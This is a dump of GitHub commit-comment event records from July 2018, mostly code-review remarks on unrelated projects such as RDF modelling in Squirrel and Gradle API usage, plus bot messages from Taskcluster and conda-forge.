{"id":"7921482246","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29602432,"position":null,"line":null,"path":null,"commit_id":"b2f7ac4a002db7a33da0c195c306b6b063db4dfe","created_at":"2018-07-05T07:40:52Z","updated_at":"2018-07-05T07:40:52Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/KMdzu2vHTT6bk0YZpZskoA\",\n            \"queue:schedule-task:taskcluster-github/KMdzu2vHTT6bk0YZpZskoA/KMdzu2vHTT6bk0YZpZskoA\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/KMdzu2vHTT6bk0YZpZskoA\",\n                \"queue:schedule-task:taskcluster-github/KMdzu2vHTT6bk0YZpZskoA/KMdzu2vHTT6bk0YZpZskoA\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-05T07:40:52.415Z\n\n</details>"}},"created_at":"2018-07-05T07:40:52Z"}
{"id":"7921488100","type":"CommitCommentEvent","actor":{"login":"yuhhaurlin"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29602443,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-05T07:42:12Z","updated_at":"2018-07-05T07:42:12Z","author_association":"COLLABORATOR","body":"It looks like nla_parse() is changed from 4.11 to 4.12. I think there is nothing I should do. If someone wants to build this driver with kernel older than 4.12, he can remove the last parameter of nla_parse(). Thanks."}},"created_at":"2018-07-05T07:42:12Z"}
{"id":"7921490380","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602446,"position":36,"line":51,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T07:42:43Z","updated_at":"2018-07-05T07:42:43Z","author_association":"NONE","body":"This is not valid and we discussed that the worker should be modeled as a resource and not as a simple literal. It also violates the definition of [`prov:wasAssociatedWith`](https://www.w3.org/TR/prov-o/#wasAssociatedWith)."}},"created_at":"2018-07-05T07:42:43Z"}
{"id":"7921490646","type":"CommitCommentEvent","actor":{"login":"raylu"},"repo":{"name":"climu/OSR-discord-bot"},"payload":{"comment":{"id":29602448,"position":16,"line":81,"path":"bot.py","commit_id":"aac3069f90116a727c97003609b71208b5df092e","created_at":"2018-07-05T07:42:46Z","updated_at":"2018-07-05T07:42:46Z","author_association":"COLLABORATOR","body":"wait, what does this `except` do?"}},"created_at":"2018-07-05T07:42:46Z"}
{"id":"7921495269","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602453,"position":37,"line":52,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T07:43:48Z","updated_at":"2018-07-05T07:43:48Z","author_association":"NONE","body":"This literal should be typed as `xsd:long` or `xsd:integer`."}},"created_at":"2018-07-05T07:43:48Z"}
{"id":"7921498970","type":"CommitCommentEvent","actor":{"login":"wolfs"},"repo":{"name":"xvik/gradle-animalsniffer-plugin"},"payload":{"comment":{"id":29602459,"position":14,"line":74,"path":"src/main/groovy/ru/vyarus/gradle/plugin/animalsniffer/signature/BuildSignatureTask.groovy","commit_id":"c16b00aff5c4db48313fd571ba4bcd85e649393c","created_at":"2018-07-05T07:44:34Z","updated_at":"2018-07-05T07:44:34Z","author_association":"NONE","body":"Then I would make this property final:\r\n```\r\nfinal ConfigurableFileCollection files = project.files()\r\n```\r\n\r\nThen it can be configured like this:\r\n```\r\ntask.files.from(...) // Adding some stuff\r\ntask.files.setFrom(...) // replacing the contents\r\n```\r\n\r\nNote that currently you are continuing to use an internal API (`FileCollectionAdapter` & `ListBackedFileSet`), which can change on any Gradle version."}},"created_at":"2018-07-05T07:44:34Z"}
{"id":"7921499181","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602462,"position":39,"line":54,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T07:44:37Z","updated_at":"2018-07-05T07:44:37Z","author_association":"NONE","body":"This triple has the wrong order. Now, it looks like the activity has been generated by the result graph."}},"created_at":"2018-07-05T07:44:37Z"}
{"id":"7921499927","type":"CommitCommentEvent","actor":{"login":"404401399"},"repo":{"name":"404401399/Wearight"},"payload":{"comment":{"id":29602463,"position":9,"line":12,"path":"app/src/androidTest/java/com/example/eating/wearight/ExampleInstrumentedTest.java","commit_id":"cd85d96241b18f5211a0bd6e58625b9a946fc1f6","created_at":"2018-07-05T07:44:46Z","updated_at":"2018-07-05T07:44:46Z","author_association":"OWNER","body":"- * Instrumented test, which will execute on an Android device."}},"created_at":"2018-07-05T07:44:46Z"}
{"id":"7921500943","type":"CommitCommentEvent","actor":{"login":"dGazizullin"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29602466,"position":9,"line":9,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-05T07:44:59Z","updated_at":"2018-07-05T07:44:59Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-05T07:44:59Z"}
{"id":"7921502524","type":"CommitCommentEvent","actor":{"login":"Samxzeng"},"repo":{"name":"Samxzeng/hello-world"},"payload":{"comment":{"id":29602472,"position":null,"line":null,"path":null,"commit_id":"13ac63de969b054bb570a4f2efdade39b018ed16","created_at":"2018-07-05T07:45:19Z","updated_at":"2018-07-05T07:45:19Z","author_association":"OWNER","body":"**good to go**"}},"created_at":"2018-07-05T07:45:19Z"}
{"id":"7921504392","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29602476,"position":null,"line":null,"path":null,"commit_id":"1197dc24d1e22eb6ec4dbf111bf490bb20b48789","created_at":"2018-07-05T07:45:42Z","updated_at":"2018-07-05T07:45:42Z","author_association":"OWNER","body":"Ох... Я сейчас в шоке от RTC. Допилю и покажу что там!"}},"created_at":"2018-07-05T07:45:42Z"}
{"id":"7921506092","type":"CommitCommentEvent","actor":{"login":"hhshinH"},"repo":{"name":"hhshinH/git"},"payload":{"comment":{"id":29602481,"position":null,"line":null,"path":null,"commit_id":"1245219a132c0fd979ffc34c7466f7bdd8800ad5","created_at":"2018-07-05T07:46:05Z","updated_at":"2018-07-05T07:46:05Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-05T07:46:05Z"}
{"id":"7921509599","type":"CommitCommentEvent","actor":{"login":"heshamMassoud"},"repo":{"name":"commercetools/commercetools-payone-integration"},"payload":{"comment":{"id":29602490,"position":24,"line":136,"path":"service/src/main/java/com/commercetools/pspadapter/payone/config/ServiceConfig.java","commit_id":"31c8f0b4085e20431d44d1c88de8c2aa74b29f9a","created_at":"2018-07-05T07:46:54Z","updated_at":"2018-07-05T07:46:54Z","author_association":"MEMBER","body":"In my opinion the name `splitList` is not a good name. It doesn't say that the list would be trimmed and it doesn't say on what the list would be split on. So It's always gonna be split on this hard coded value."}},"created_at":"2018-07-05T07:46:54Z"}
{"id":"7921509872","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602491,"position":40,"line":55,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T07:46:57Z","updated_at":"2018-07-05T07:46:57Z","author_association":"NONE","body":"Why is the URI written as literal? A URI is a resource :wink: "}},"created_at":"2018-07-05T07:46:57Z"}
{"id":"7921512041","type":"CommitCommentEvent","actor":{"login":"dGazizullin"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29602494,"position":18,"line":18,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-05T07:47:27Z","updated_at":"2018-07-05T07:47:27Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-05T07:47:27Z"}
{"id":"7921512194","type":"CommitCommentEvent","actor":{"login":"Mustela-sibirica"},"repo":{"name":"Mustela-sibirica/ML-book"},"payload":{"comment":{"id":29602495,"position":null,"line":null,"path":null,"commit_id":"f3c3801df79a6158ea4b3ec8695be623aa4343f6","created_at":"2018-07-05T07:47:29Z","updated_at":"2018-07-05T07:47:29Z","author_association":"OWNER","body":"TensorFlow+Keras深度学习人工智能实践应用"}},"created_at":"2018-07-05T07:47:29Z"}
{"id":"7921512329","type":"CommitCommentEvent","actor":{"login":"medali994"},"repo":{"name":"medali994/fil-rouge"},"payload":{"comment":{"id":29602497,"position":null,"line":null,"path":null,"commit_id":"62cbce02f9d33106625a6c87d7ed8366cbcf42ed","created_at":"2018-07-05T07:47:31Z","updated_at":"2018-07-05T07:47:31Z","author_association":"OWNER","body":"[COMPTE Rendu 07.18.pdf](https://github.com/medali994/fil-rouge/files/2165485/COMPTE.Rendu.07.18.pdf)\r\n"}},"created_at":"2018-07-05T07:47:31Z"}
{"id":"7921513735","type":"CommitCommentEvent","actor":{"login":"morgoth"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":29602502,"position":3,"line":2,"path":"lib/rollbar/version.rb","commit_id":"87d23b962c9a3df0c3aec4f1ea10c194077ab715","created_at":"2018-07-05T07:47:51Z","updated_at":"2018-07-05T07:47:51Z","author_association":"CONTRIBUTOR","body":"@ArturMoczulski 2.16.3 It's missing on rubygems"}},"created_at":"2018-07-05T07:47:51Z"}
{"id":"7921514255","type":"CommitCommentEvent","actor":{"login":"heshamMassoud"},"repo":{"name":"commercetools/commercetools-payone-integration"},"payload":{"comment":{"id":29602503,"position":24,"line":136,"path":"service/src/main/java/com/commercetools/pspadapter/payone/config/ServiceConfig.java","commit_id":"31c8f0b4085e20431d44d1c88de8c2aa74b29f9a","created_at":"2018-07-05T07:47:58Z","updated_at":"2018-07-05T07:47:58Z","author_association":"MEMBER","body":"Please checkout my suggestion: https://github.com/commercetools/commercetools-payone-integration/pull/222#discussion_r199101384 and discuss :)"}},"created_at":"2018-07-05T07:47:58Z"}
{"id":"7921514499","type":"CommitCommentEvent","actor":{"login":"d-korni"},"repo":{"name":"climu/OSR-discord-bot"},"payload":{"comment":{"id":29602505,"position":16,"line":81,"path":"bot.py","commit_id":"aac3069f90116a727c97003609b71208b5df092e","created_at":"2018-07-05T07:48:02Z","updated_at":"2018-07-05T07:48:02Z","author_association":"COLLABORATOR","body":"I think it is for commands that have not been defined, so we don't get an error."}},"created_at":"2018-07-05T07:48:02Z"}
{"id":"7921515131","type":"CommitCommentEvent","actor":{"login":"Mustela-sibirica"},"repo":{"name":"Mustela-sibirica/ML-book"},"payload":{"comment":{"id":29602508,"position":null,"line":null,"path":null,"commit_id":"2af5c64857573e6c5a369908c26433f19106c7fd","created_at":"2018-07-05T07:48:10Z","updated_at":"2018-07-05T07:48:10Z","author_association":"OWNER","body":"some script in machine learning books."}},"created_at":"2018-07-05T07:48:10Z"}
{"id":"7921519161","type":"CommitCommentEvent","actor":{"login":"Rastafouille"},"repo":{"name":"Rastafouille/BeeDetection"},"payload":{"comment":{"id":29602519,"position":null,"line":null,"path":null,"commit_id":"b077ed4eab9509971e25a123339a596b5a30ef5d","created_at":"2018-07-05T07:49:07Z","updated_at":"2018-07-05T07:49:07Z","author_association":"OWNER","body":"yep, je m'amuse, pour la détection c'est bon, maintenant tracking pour du comptage et ensuite détection de pollen et varroa !\r\n"}},"created_at":"2018-07-05T07:49:07Z"}
{"id":"7921520552","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwikisas/application-licensing"},"payload":{"comment":{"id":29602527,"position":9,"line":113,"path":"application-licensing-licensor/application-licensing-licensor-api/src/main/java/com/xwiki/licensing/internal/UserCounter.java","commit_id":"52d20302238af3ac99dab243030438d0fd63c54d","created_at":"2018-07-05T07:49:25Z","updated_at":"2018-07-05T07:49:25Z","author_association":"COLLABORATOR","body":"There's whitespace on this line."}},"created_at":"2018-07-05T07:49:25Z"}
{"id":"7921524470","type":"CommitCommentEvent","actor":{"login":"a8814549"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29602540,"position":1,"line":1,"path":"respo/config-client-dev.properties","commit_id":"a68876a6211369bae723348d5f8c3defe4a55e04","created_at":"2018-07-05T07:50:17Z","updated_at":"2018-07-05T07:50:17Z","author_association":"NONE","body":"foo = foo版本4"}},"created_at":"2018-07-05T07:50:17Z"}
{"id":"7921532734","type":"CommitCommentEvent","actor":{"login":"JinTianWeiLai"},"repo":{"name":"JinTianWeiLai/earth"},"payload":{"comment":{"id":29602556,"position":37,"line":37,"path":"src/com/Proterozoic/web/LoginServlet.java","commit_id":"233d77704aa14300d52acf59eb8496b99574c30e","created_at":"2018-07-05T07:52:05Z","updated_at":"2018-07-05T07:52:05Z","author_association":"OWNER","body":"//"}},"created_at":"2018-07-05T07:52:05Z"}
{"id":"7921537113","type":"CommitCommentEvent","actor":{"login":"dGazizullin"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29602568,"position":28,"line":28,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-05T07:53:03Z","updated_at":"2018-07-05T07:53:03Z","author_association":"OWNER","body":"Предполагалось использовать ее для передачи ID автора в класс новости, убрал."}},"created_at":"2018-07-05T07:53:03Z"}
{"id":"7921538239","type":"CommitCommentEvent","actor":{"login":"ci010"},"repo":{"name":"Indexyz/coolq-minecraft"},"payload":{"comment":{"id":29602571,"position":5,"line":3,"path":".gitignore","commit_id":"afe71cfb322d18225e20c88539faa2c2c559dbaf","created_at":"2018-07-05T07:53:19Z","updated_at":"2018-07-05T07:53:19Z","author_association":"NONE","body":"听上去不错，加我一个？"}},"created_at":"2018-07-05T07:53:19Z"}
{"id":"7921538426","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602573,"position":null,"line":null,"path":null,"commit_id":"4e856f057d9a48dc87e0b49bcee6b5d0f522a2a8","created_at":"2018-07-05T07:53:21Z","updated_at":"2018-07-05T07:53:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update README, update link into Trello](https://trello.com/c/mIu88GaK/22-update-readme-update-link-into-trello)"}},"created_at":"2018-07-05T07:53:21Z"}
{"id":"7921540009","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"PotatoProject/frameworks_base"},"payload":{"comment":{"id":29602575,"position":null,"line":null,"path":null,"commit_id":"de2c96408469c058bba75fe1e7f7cb3be9082962","created_at":"2018-07-05T07:53:42Z","updated_at":"2018-07-05T07:53:42Z","author_association":"CONTRIBUTOR","body":"Was this not the speed you need? :smirk: "}},"created_at":"2018-07-05T07:53:42Z"}
{"id":"7921544470","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29602582,"position":null,"line":null,"path":null,"commit_id":"1197dc24d1e22eb6ec4dbf111bf490bb20b48789","created_at":"2018-07-05T07:54:37Z","updated_at":"2018-07-05T07:54:37Z","author_association":"COLLABORATOR","body":"Ничего, прорвемся. У меня есть идея, как с помощью Platforms.h обходится с различными сигнатурами методов. Сейчас закоммичу на примере SystemClock"}},"created_at":"2018-07-05T07:54:37Z"}
{"id":"7921548907","type":"CommitCommentEvent","actor":{"login":"kishankarthi"},"repo":{"name":"kishankarthi/JAVASCRIPT-30"},"payload":{"comment":{"id":29602590,"position":null,"line":null,"path":null,"commit_id":"7da93732e755733c8d4d58f1a08d1a043afddcf0","created_at":"2018-07-05T07:55:35Z","updated_at":"2018-07-05T07:55:35Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-05T07:55:35Z"}
{"id":"7921549300","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602592,"position":45,"line":131,"path":"src/main/java/org/aksw/simba/squirrel/metadata/CrawlingActivity.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T07:55:41Z","updated_at":"2018-07-05T07:55:41Z","author_association":"NONE","body":"Which kind of host is meant? Is it the host that has been contacted to crawl the URI or is it the address of the SPARQL endpoint that could be used to store that result graph? The method name seems to reflect the first case but the implementation clearly is for the other case. That should be clarified by either renaming the method or changing its implementation."}},"created_at":"2018-07-05T07:55:41Z"}
{"id":"7921553082","type":"CommitCommentEvent","actor":{"login":"stefanpolzer"},"repo":{"name":"mpay24/mpay24-php"},"payload":{"comment":{"id":29602597,"position":null,"line":null,"path":null,"commit_id":"1b38315ae3df610f7cdd85312152f3505dab1848","created_at":"2018-07-05T07:56:29Z","updated_at":"2018-07-05T07:56:29Z","author_association":"CONTRIBUTOR","body":"In oder Versions of PHPUnit you had to add `require_once ('PHPUnit/Framework/TestCase.php');` to the Test Case.\r\nAs far as I know PHP 5.3.3 could be a lite bit tricky with PHP unit. Why could we change the minimum supporter version not to PHP 5.4 or better 5.6, I mean PHP 5.3 EOL was 2014 and PHP 5.4 EOL was 2015 and also PHP 5.5 is EOL since 2016... In terms of security those old Versions are highly risky. Why do we encourage people to use those old versions that long?"}},"created_at":"2018-07-05T07:56:29Z"}
{"id":"7921554052","type":"CommitCommentEvent","actor":{"login":"chronos25"},"repo":{"name":"chronos25/Codechef_mysubmissions"},"payload":{"comment":{"id":29602601,"position":null,"line":null,"path":null,"commit_id":"140dcb1baf9e96de045aa6dfc6f9f93138d9d366","created_at":"2018-07-05T07:56:41Z","updated_at":"2018-07-05T07:56:41Z","author_association":"OWNER","body":"Problem Link : https://www.codechef.com/JAN18/problems/RECTANGL/"}},"created_at":"2018-07-05T07:56:41Z"}
{"id":"7921554480","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602603,"position":41,"line":56,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T07:56:47Z","updated_at":"2018-07-05T07:56:47Z","author_association":"NONE","body":"Your `getHost()` method is generating a URL which can be used as resource. It is not clear to me why you are storing it as a literal."}},"created_at":"2018-07-05T07:56:47Z"}
{"id":"7921555657","type":"CommitCommentEvent","actor":{"login":"maxrobot"},"repo":{"name":"clearmatics/ion"},"payload":{"comment":{"id":29602612,"position":1,"line":1,"path":"contracts/SafeMath.sol","commit_id":"8fea3115fb8cb9f9fb1050e909c4eb757883e7a7","created_at":"2018-07-05T07:57:00Z","updated_at":"2018-07-05T07:57:00Z","author_association":"CONTRIBUTOR","body":"Correct oversight on my behalf will remove ASAP!"}},"created_at":"2018-07-05T07:57:00Z"}
{"id":"7921556647","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602619,"position":null,"line":null,"path":null,"commit_id":"1b74622ea4701aff28e587c83d519fedff8088ac","created_at":"2018-07-05T07:57:14Z","updated_at":"2018-07-05T07:57:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adding boilerplate](https://trello.com/c/iNSD3EXw/23-adding-boilerplate)"}},"created_at":"2018-07-05T07:57:14Z"}
{"id":"7921557464","type":"CommitCommentEvent","actor":{"login":"datphamict"},"repo":{"name":"datphamict/bigbluebutton"},"payload":{"comment":{"id":29602627,"position":null,"line":null,"path":null,"commit_id":"692cf7870c4476b5f931ad5af95ea804bbd08256","created_at":"2018-07-05T07:57:23Z","updated_at":"2018-07-05T07:57:23Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-05T07:57:23Z"}
{"id":"7921558078","type":"CommitCommentEvent","actor":{"login":"EionRobb"},"repo":{"name":"bitlbee/bitlbee"},"payload":{"comment":{"id":29602632,"position":null,"line":null,"path":null,"commit_id":"c17d0af8bfef467ad23bb6eb83e983a2c9063f68","created_at":"2018-07-05T07:57:30Z","updated_at":"2018-07-05T07:57:30Z","author_association":"CONTRIBUTOR","body":"awful hack is best hack"}},"created_at":"2018-07-05T07:57:30Z"}
{"id":"7921560637","type":"CommitCommentEvent","actor":{"login":"mp911de"},"repo":{"name":"spring-projects/spring-data-mongodb"},"payload":{"comment":{"id":29602638,"position":null,"line":null,"path":null,"commit_id":"aab86d23c9eb37ef3d7db05d84327c9fe55b51d0","created_at":"2018-07-05T07:58:03Z","updated_at":"2018-07-05T07:58:03Z","author_association":"MEMBER","body":"Good catch. Care to file a ticket in https://jira.spring.io/browse/DATAMONGO and submit a pull request?"}},"created_at":"2018-07-05T07:58:03Z"}
{"id":"7921586032","type":"CommitCommentEvent","actor":{"login":"rahuldshetty"},"repo":{"name":"rahuldshetty/discordNotifBot"},"payload":{"comment":{"id":29602682,"position":null,"line":null,"path":null,"commit_id":"ce8567fa35824cae2cf3da38431af0e29232848d","created_at":"2018-07-05T08:03:20Z","updated_at":"2018-07-05T08:03:20Z","author_association":"OWNER","body":"f"}},"created_at":"2018-07-05T08:03:20Z"}
{"id":"7921587360","type":"CommitCommentEvent","actor":{"login":"wpdbsx"},"repo":{"name":"wpdbsx/my-first-project"},"payload":{"comment":{"id":29602685,"position":1,"line":1,"path":"4.txt","commit_id":"86f7d45ab9ab67eeb4a4b988f4a8500feeb2f40d","created_at":"2018-07-05T08:03:37Z","updated_at":"2018-07-05T08:03:37Z","author_association":"OWNER","body":"abcdd"}},"created_at":"2018-07-05T08:03:37Z"}
{"id":"7921588976","type":"CommitCommentEvent","actor":{"login":"hajarrashidi"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29602688,"position":null,"line":null,"path":null,"commit_id":"47794ae9046a056f37b023a95c933840c7d010ef","created_at":"2018-07-05T08:03:57Z","updated_at":"2018-07-05T08:03:57Z","author_association":"NONE","body":"doesn't seem to help by having this new testmatch"}},"created_at":"2018-07-05T08:03:57Z"}
{"id":"7921590412","type":"CommitCommentEvent","actor":{"login":"iceeee"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29602693,"position":25,"line":282,"path":"packages/@vue/cli-ui/apollo-server/connectors/projects.js","commit_id":"5b61f8f683466a3c23223ac565abba13ff9f53db","created_at":"2018-07-05T08:04:15Z","updated_at":"2018-07-05T08:04:15Z","author_association":"NONE","body":"!!!"}},"created_at":"2018-07-05T08:04:15Z"}
{"id":"7921597046","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602705,"position":42,"line":57,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T08:05:39Z","updated_at":"2018-07-05T08:05:39Z","author_association":"NONE","body":"This triple connects your activity to the general class `Association` with the `qualifiedAssociation` property. However, this does not really make sense and it is not what we have discussed. You need to create an instance of the `Association` class to which you can connect it. Otherwise all your activities are connected to the general `Association` class node."}},"created_at":"2018-07-05T08:05:39Z"}
{"id":"7921598048","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pymedphys-feedstock"},"payload":{"comment":{"id":29602709,"position":null,"line":null,"path":null,"commit_id":"937309ab3913b254f0cce8c2ae80460cf603d258","created_at":"2018-07-05T08:05:53Z","updated_at":"2018-07-05T08:05:53Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @simonbiggs were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @simonbiggs were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T08:05:53Z"}
{"id":"7921599772","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29602715,"position":43,"line":58,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"6dab30fc7ea5025302fc2b6440fd9246f4f73d4b","created_at":"2018-07-05T08:06:16Z","updated_at":"2018-07-05T08:06:16Z","author_association":"NONE","body":"The same problem as above. You will have to use an instance of the `Association` type."}},"created_at":"2018-07-05T08:06:16Z"}
{"id":"7921600013","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29602717,"position":null,"line":null,"path":null,"commit_id":"097a027fb0c2dcc1d3859df22fc7f99be1a9c56b","created_at":"2018-07-05T08:06:19Z","updated_at":"2018-07-05T08:06:19Z","author_association":"COLLABORATOR","body":"Maybe not the best... but the easiest! "}},"created_at":"2018-07-05T08:06:19Z"}
{"id":"7921601373","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602724,"position":null,"line":null,"path":null,"commit_id":"b2a24a431c2e5d89c2a2ae2f983569c197f375d7","created_at":"2018-07-05T08:06:36Z","updated_at":"2018-07-05T08:06:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update html, adding basics tag, lang, title, meta description, link to font awesome](https://trello.com/c/BGvvnGU0/24-update-html-adding-basics-tag-lang-title-meta-description-link-to-font-awesome)"}},"created_at":"2018-07-05T08:06:36Z"}
{"id":"7921603252","type":"CommitCommentEvent","actor":{"login":"BaiShaoqi"},"repo":{"name":"greenplum-db/plcontainer"},"payload":{"comment":{"id":29602732,"position":null,"line":null,"path":null,"commit_id":"f0e35da3975f4cbf1f401d9577287379a6c8d366","created_at":"2018-07-05T08:07:03Z","updated_at":"2018-07-05T08:07:03Z","author_association":"CONTRIBUTOR","body":"This pr has causing plcontainer master pipeline red because it cause coredump."}},"created_at":"2018-07-05T08:07:03Z"}
